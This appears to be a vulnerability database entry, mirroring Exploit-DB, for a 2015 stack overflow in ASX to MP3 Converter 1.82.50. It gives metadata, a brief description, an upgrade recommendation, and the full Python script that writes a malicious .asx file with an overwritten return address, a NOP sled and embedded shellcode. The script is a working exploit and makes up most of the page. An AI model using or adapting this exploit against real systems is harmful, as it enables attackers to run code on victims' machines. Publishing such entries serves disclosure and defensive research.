ASX to MP3 Converter 1.82.50 Stack Overflow

vendor:

ASX to MP3 Converter

by:

ex_ptr

9,3

CVSS

HIGH

Stack Overflow

121

CWE

Product Name: ASX to MP3 Converter

Affected Version From: 1.82.50

Affected Version To: 1.82.50

Patch Exists: YES

Related CWE: N/A

CPE: a:mini-stream:asx_to_mp3_converter

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2015

ASX to MP3 Converter 1.82.50 Stack Overflow

ASX to MP3 Converter 1.82.50 is vulnerable to a stack overflow vulnerability. An attacker can exploit this vulnerability by crafting a malicious ASX file and sending it to the victim. When the victim opens the file, the attacker's malicious code will be executed, allowing the attacker to gain control of the victim's system.

Mitigation:

Upgrade to the latest version of ASX to MP3 Converter.

Source

Exploit-DB raw data:

'''
# Exploit Title: ASX to MP3 Converter 1.82.50 Stack Overflow
# Date: 2 Oct 2015
# Exploit Author: ex_ptr
# Vendor Homepage: http://mini-stream.net
# Version: 1.82.50
# Tested on: Windows XP SP3
'''

import struct
filename = "exploit.asx"

dummy = "A"*0x104
EIP   = struct.pack('<I', 0x76af3adc)
FFFF  = "\xFF\xFF\xFF\xFF"
NOP   = "\x90"*4
Shell = ("\x31\xc9\xbd\x90\xb7\x29\xb8\xd9\xf7\xd9\x74\x24\xf4\xb1\x1e"
		 "\x58\x31\x68\x11\x03\x68\x11\x83\xe8\x6c\x55\xdc\x44\x64\xde"
		 "\x1f\xb5\x74\x54\x5a\x89\xff\x16\x60\x89\xfe\x09\xe1\x26\x18"
		 "\x5d\xa9\x98\x19\x8a\x1f\x52\x2d\xc7\xa1\x8a\x7c\x17\x38\xfe"
		 "\xfa\x57\x4f\xf8\xc3\x92\xbd\x07\x01\xc9\x4a\x3c\xd1\x2a\xb7"
		 "\x36\x3c\xb9\xe8\x9c\xbf\x55\x70\x56\xb3\xe2\xf6\x37\xd7\xf5"
		 "\xe3\x43\xfb\x7e\xf2\xb8\x8a\xdd\xd1\x3a\x4f\x82\x28\xb5\x2f"
		 "\x6b\x2f\xb2\xe9\xa3\x24\x84\xf9\x48\x4a\x19\xac\xc4\xc3\x29"
		 "\x27\x22\x90\xea\x5d\x83\xff\x94\x79\xc1\x73\x01\xe1\xf8\xfe"
		 "\xdf\x46\xfa\x18\xbc\x09\x68\x84\x43")

exploit = dummy + EIP + FFFF + NOP + Shell

f = open(filename,'wb')
f.write(exploit)
f.close()